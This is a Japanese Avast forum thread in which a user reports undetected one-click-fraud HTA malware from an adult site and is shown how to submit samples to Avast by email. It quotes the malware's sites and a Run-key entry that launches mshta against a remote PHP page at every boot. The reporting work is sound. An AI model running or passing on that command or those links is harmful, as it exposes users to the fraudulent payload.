Avast WEBforum
Non-English Zone => 日本語 => Topic started by: flow_my_tears_1987 on November 06, 2011, 02:49:55 PM
-
はじめましてワンクリックウェアなどの送信しています物です。
http://www.anteater-movies.com/
File name 「29ce.hta」
http://www.virustotal.com/file-scan/report.html?id=d9c1a6bb2e101ef536bf73e7461fc791344260a7024b2d082f52d4143e128f20-1319292870
C:\Windows\system32\mshta.exe
O4 - HKCU\..\Run: [www.high-quality-movie.com] mshta http://www.anteater-movies.com/regist2.php
送信しても対応しません。カスペ以外対応しません。次の日アクセスすると4桁が変わってます
また送信しても反応しません
ADULTは週ごとに新しいurlが生まれます。
-
こんにちは flow_my_tears_1987 さん
送信しても対応されないとのことですが、送信はメールとチェストのどちらから行われているのでしょうか?
経験上、メールでの送信の方が対応率は高い気がしますので、もしチェストからの送信である場合はメールで送信してみてください。
その際はファイルをZIPで圧縮し、"virus"とパスワードをかけたものを添付してください。
文面は、普段使っているテンプレートまんまですがこんな感じでどうでしょうか。
ファイル名やVirustotalのURL等は毎回書き換える必要がありますが。
送信先: virus@avast.com
件名:
Malware (one-click porn regist ad)
本文:
Hello.
Probably, attached files are infected with threat.
Please examine this.
Details are as follows.
Thank you for your hard work!
<Attached file info>
Decompression password : virus
File name : 29ce.zip
In file :
29ce.hta
<Where did I get this?>
http://www.anteater-movies.com/
http://www.anteater-movies.com/confilm2.php
<Additional Info>
After executing this hta file, porn-site ad is displayed every boot.
The ad says "Thanks for registering our porn site. You have to pay service charge within 3 days."
Of course, we don't have to pay this.
<OS>
Windows
<Country>
Japan
<Other detectable software>
Only Kaspersky.
http://www.virustotal.com/file-scan/report.html?id=d9c1a6bb2e101ef536bf73e7461fc791344260a7024b2d082f52d4143e128f20-1319292870
それから、flow_my_tears_1987 さんのメールアドレスが表示設定になっています。
1. 右上の"PROFILE"をクリック
2. 左側の"Account Related Settings"を開く
3. "Hide email address from public?"にチェックを入れる
4. 一番下の"Change Profile"を押す
の手順で、メールアドレス非表示の設定を行われることをお勧めします。
-
ありがとうございます。
巡回して対応していないhtaをメールで送っております。
まぁ、最近リカバリーして手抜きで圧縮、パスなしで
avast、bitdefendefに送ってましたが、
対応してもらっていましたが、再度送って見ます。
同じサイトから落としてみました。
46c2.hta
http://www.virustotal.com/file-scan/report.html?id=8a58a5e6149ce50b843ee612add4c57aa3972f2e33b54d483f9b593020425f1d-1320626255
win xp sp3
avast 6.1.1289
webrep なし 自動サンドボックス 無効
trafficlight by bitdefender
pc tools firewall plus
returnil